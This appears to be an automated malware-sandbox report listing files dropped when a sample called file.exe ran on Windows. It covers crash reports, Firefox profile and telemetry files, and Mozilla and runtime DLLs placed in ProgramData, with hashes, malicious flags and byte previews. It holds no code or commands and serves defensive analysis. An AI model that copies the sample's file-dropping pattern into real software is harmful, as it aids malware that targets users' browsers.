                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):10237
                                                                                        Entropy (8bit):5.498288591230544
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                        MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                        SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                        SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                        SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                        Malicious:false
                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_4ddf12fb51.exe_312c450a3fd284f878193752bca763a6e90e9_3120562b_8b79000c-e796-4399-9a38-adca04f2e55c\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):0.9708511978520408
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:XcHjDXGQ90KDgf4Fy6jxpZrP2izuiFcZ24IO8O:M/GQ+KDgf4Pj9FzuiFcY4IO8O
                                                                                        MD5:938D7559C14F39F4679C1783A76CE278
                                                                                        SHA1:6F9BAFA538EC66AC3A9FD9847E96A7EEC869EAAE
                                                                                        SHA-256:173ED1698AFEF83C920B2EE4DD41A4B0DD896F72DEE7D5C901AF921D9148C523
                                                                                        SHA-512:2AA6068DEC73A7702873073FC584E42DFFDB4DCE4A70E2CBE77103A3920F29A208732213FBEE7C1F4A68FB7DD1C7350D70E48B8F3892A1EA5DC0358DEEC02F83
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.2.7.1.7.2.0.0.5.3.5.7.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.2.7.1.7.2.0.7.4.4.7.5.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.7.9.0.0.0.c.-.e.7.9.6.-.4.3.9.9.-.9.a.3.8.-.a.d.c.a.0.4.f.2.e.5.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.9.f.a.7.0.5.-.0.8.2.f.-.4.2.5.c.-.b.b.2.3.-.8.2.8.6.b.8.a.8.a.7.f.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.d.d.f.1.2.f.b.5.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.4.2.4.-.0.0.0.1.-.0.0.1.5.-.a.b.a.0.-.d.0.7.4.8.8.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.4.2.0.b.3.5.3.2.2.d.9.f.e.f.b.9.8.4.0.c.a.0.2.d.9.5.7.d.2.4.d.0.0.0.0.f.f.f.f.!.0.0.0.0.f.7.4.b.6.c.e.c.b.5.a.6.8.0.4.2.d.e.e.5.4.d.e.3.5.6.a.2.a.b.8.c.a.9.d.7.f.6.2.2.!.4.d.d.f.1.2.f.b.5.1...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_d9e33034f05c4f5322457bcb335deaaa82ae635d_864df792_9280fe99-8d6b-425e-9600-7673df17e4c3\Report.wer

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.118001639518091
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:A8hghvVPl90Vz6pX03jxpZrP2HV85zuiF5Z24IO8ThB:WVN+Vz6pMj9CQzuiF5Y4IO8L
                                                                                        MD5:74B77AF53301AB7095DADFC77006922A
                                                                                        SHA1:F09557B2CC606A8A401EAA154FC1C71D4B9279F5
                                                                                        SHA-256:17168533B32E58399D889E57B270D33942D222B48CDCFD5EB0B7F30C186AE2D7
                                                                                        SHA-512:F4E853DAB1D91D45777B5D1B29F89D96B3FE3B46B4B40DCC3CB382D6C53FD1A969B23BF796B784BCAF6A0A816A13CD24B144C9AB73E459FF027BB70B85970057
                                                                                        Malicious:true
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.2.7.1.6.7.4.3.9.2.8.8.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.2.7.1.6.7.6.3.5.3.1.1.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.8.0.f.e.9.9.-.8.d.6.b.-.4.2.5.e.-.9.6.0.0.-.7.6.7.3.d.f.1.7.e.4.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.e.5.6.2.5.4.-.7.f.5.5.-.4.f.f.5.-.9.f.7.5.-.6.3.6.0.9.1.f.3.2.b.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.3.4.-.0.0.0.1.-.0.0.1.5.-.8.5.4.5.-.2.1.4.a.8.8.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.f.7.4.b.6.c.e.c.b.5.a.6.8.0.4.2.d.e.e.5.4.d.e.3.5.6.a.2.a.b.8.c.a.9.d.7.f.6.2.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4920.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Jul 24 05:14:35 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):57142
                                                                                        Entropy (8bit):2.5293398502144107
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:kCdwWgjXZqgntXQ1yX03ii5tOQOJwk2VvIz7a3X9OtD/dGVaEqPYdGggukiTfOGH:rHgnEj3MQEGIz7a3XoiOYTgJ/lBmNbOU
                                                                                        MD5:751E0DDA658AB794A86C89607C6FA474
                                                                                        SHA1:3D1A6989568D97D76CA1F6F5293B8C210A47401F
                                                                                        SHA-256:A5DBA24661BE11F536E3CABF3D4C7E9D1CAF980A60B6EABECA4673D752AC6A18
                                                                                        SHA-512:BC3AEC3AC955DE295A2DDD891B1C8048240FEAB462DF2987523D289FAD0599AF4C7E23AE2F030B80B779425970FA0103D1070105E7809FE69FE44F06985EA7B5
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ..........f............4...............<.......t....7..........T.......8...........T............_...............&...........(..............................................................................eJ......h)......GenuineIntel............T.......4......f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C7C.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8330
                                                                                        Entropy (8bit):3.6947417056686627
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJsCS6gp6Y2DASUBfgmfBzlQKpDR889bx0sfIbm:R6lXJm6gp6YNSUBfgmfFlZpxnfJ
                                                                                        MD5:93ED19473F8CDC7BB14466135A38BF52
                                                                                        SHA1:F91D6D127E6F61A633476409CC1E790CD2C5BA06
                                                                                        SHA-256:1C42A66D9856850276D0471A111CA439B00EDC336AD1055E962784F380F30383
                                                                                        SHA-512:DA902C0C57FF3E0AAE56E2EAB1035D72C981AF380364FF20D00BA0185C7087671BD4619068E3473C29109B0672A88B292EFA69B08A00685B7FE990629DF6225F
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.8.8.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CCC.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4553
                                                                                        Entropy (8bit):4.432948836411081
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zs1Jg77aI9ITWpW8VYvYm8M4JWMFzuAj+q8MS00BPid:uIjfPI7Oi7VTJ1Xj10BPid
                                                                                        MD5:03BE3E57A55BCA5390D3010A2D3D3B74
                                                                                        SHA1:E2ED4FDF0521E4E389142F7804EFB4A09C3AC6C6
                                                                                        SHA-256:994BAEC2966BA346AD0FA8C0649D1143D3986783F358D6FD99B8DC27028532B5
                                                                                        SHA-512:679BB2A50C1C3161C80ECE2C5A4CA3E73E7A72CD482C6E6108F5813530F8E871E45155209C56F4FE83D5623B670AC8B864DAB8CF2DC019D18898B327F10CF3C5
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="424577" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB78.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 14 streams, Wed Jul 24 05:15:20 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):60460
                                                                                        Entropy (8bit):1.8266367911200314
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:rWTXt8S+oJX1OQOJwbYR3HycdS3Jg3XZt0o5NijtsG/0eqUCJnsnJwxtp:uh+oCQEwYFno3Jg3X/iOy03LRxtp
                                                                                        MD5:86160C5679FA35EF75EABC71C8ECBF39
                                                                                        SHA1:57704BCE08584FCE8E9A79B7170633DD715FB749
                                                                                        SHA-256:13B2D24B40783C1B33015776A3B4FA7DE64EA08D05C2601F7B1E6E8A09E62E1D
                                                                                        SHA-512:F6D5BCE76086279AE7E7C44CC4D05231BC59B9957031DF18C7FAD311EF0F208765100B7CDFC5024913E717C64D092B777ACA084D26465F2B10CBADE2AB2C3BDA
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ........f............4...............<............*..........T.......8...........T............2..T.......................................................................................................eJ......H.......GenuineIntel............T.......$$....f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC44.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):8324
                                                                                        Entropy (8bit):3.6910256441906544
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJEh6S6YPRq6SMgmf41QVpD089bMLsfQZkm:R6lXJy6S6YU6Zgmf4uMQfQf
                                                                                        MD5:5BFB2AE78573418DA07A4DF89BB78509
                                                                                        SHA1:C7C897E22AEF6CC57DBEEFFFE8001CBF705D5B14
                                                                                        SHA-256:9E7E94A028D23E8422D84A96D845F6EC636CEA9C44EABF655D633205B59166C8
                                                                                        SHA-512:A62A050762B5B78E187281AFBF412D4A249378CDB40DF516BB4E2F2EBABAC7C6640C2B718E14EF4E4451FD7D964DA026613E9730ED24C4CF0EAA11300E9A6D4E
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.2.5.2.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD20.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4583
                                                                                        Entropy (8bit):4.444120450220577
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsmNJg77aI9ITWpW8VYeYm8M4JyMFo+q8bsr0OBeRd:uIjfmnI7Oi7VGJm6OBeRd
                                                                                        MD5:CFD59D7562256693A634E98C76AD049E
                                                                                        SHA1:D48B0B573D7EC3855F7B9FED706ED060B660B6B7
                                                                                        SHA-256:C7F4B89055E4DC26F6CAE1CC61906B3EE5D920936928E53A4E9E92A029401110
                                                                                        SHA-512:6254EF7F1512C113D1A556C1C753C408C5A4E9C823F1DA48F2BFDDBCF69A1B08959E30E6426218DE77B8BA79E00CFEB6B658B9AA839944C2E758CDAE71F3A22E
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="424578" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_23090d7e-bd9c-4edf-b6b1-22cfe5953acc.json (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):6439
                                                                                        Entropy (8bit):5.138363111178224
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:2BMiDdDpDqcbhbVbTbfbRbObtbyEznDnSrDtTZdB:2i8ZVqcNhnzFSJtnSrDhZdB
                                                                                        MD5:BF41655EE263CD3B9DF93F7581AF109A
                                                                                        SHA1:C2617257211235BA05D4638EE54870CD10C1903C
                                                                                        SHA-256:FC43A253411C36D277B6EBC48937DEE28FB3E3A07E63CD3F9A65669C64E2D3EB
                                                                                        SHA-512:C8D4B6B060772D3244332E5EC1F37E92A260975E52B92138B5CC6D2E181C17B82E6DF370A384A279A83652E91A3668F440061C193B138C5B353DE69DB248A15D
                                                                                        Malicious:false
                                                                                        Preview:{"type":"uninstall","id":"23090d7e-bd9c-4edf-b6b1-22cfe5953acc","creationDate":"2024-07-24T06:30:27.737Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                        C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\uninstall_ping_308046B0AF4A39CB_23090d7e-bd9c-4edf-b6b1-22cfe5953acc.json.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):6439
                                                                                        Entropy (8bit):5.138363111178224
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:2BMiDdDpDqcbhbVbTbfbRbObtbyEznDnSrDtTZdB:2i8ZVqcNhnzFSJtnSrDhZdB
                                                                                        MD5:BF41655EE263CD3B9DF93F7581AF109A
                                                                                        SHA1:C2617257211235BA05D4638EE54870CD10C1903C
                                                                                        SHA-256:FC43A253411C36D277B6EBC48937DEE28FB3E3A07E63CD3F9A65669C64E2D3EB
                                                                                        SHA-512:C8D4B6B060772D3244332E5EC1F37E92A260975E52B92138B5CC6D2E181C17B82E6DF370A384A279A83652E91A3668F440061C193B138C5B353DE69DB248A15D
                                                                                        Malicious:false
                                                                                        Preview:{"type":"uninstall","id":"23090d7e-bd9c-4edf-b6b1-22cfe5953acc","creationDate":"2024-07-24T06:30:27.737Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

                                                                                        C:\ProgramData\freebl3.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):685392
                                                                                        Entropy (8bit):6.872871740790978
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: cLPbKg0oEK.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: hOYGfIcBVf.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: x83kv6AWyn.exe, Detection: malicious, Browse
                                                                                        • Filename: PdlzD56Vib.exe, Detection: malicious, Browse
                                                                                        • Filename: TY3oxeY08f.exe, Detection: malicious, Browse
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\mozglue.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):608080
                                                                                        Entropy (8bit):6.833616094889818
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: cLPbKg0oEK.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: hOYGfIcBVf.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: x83kv6AWyn.exe, Detection: malicious, Browse
                                                                                        • Filename: PdlzD56Vib.exe, Detection: malicious, Browse
                                                                                        • Filename: TY3oxeY08f.exe, Detection: malicious, Browse
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\msvcp140.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):450024
                                                                                        Entropy (8bit):6.673992339875127
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
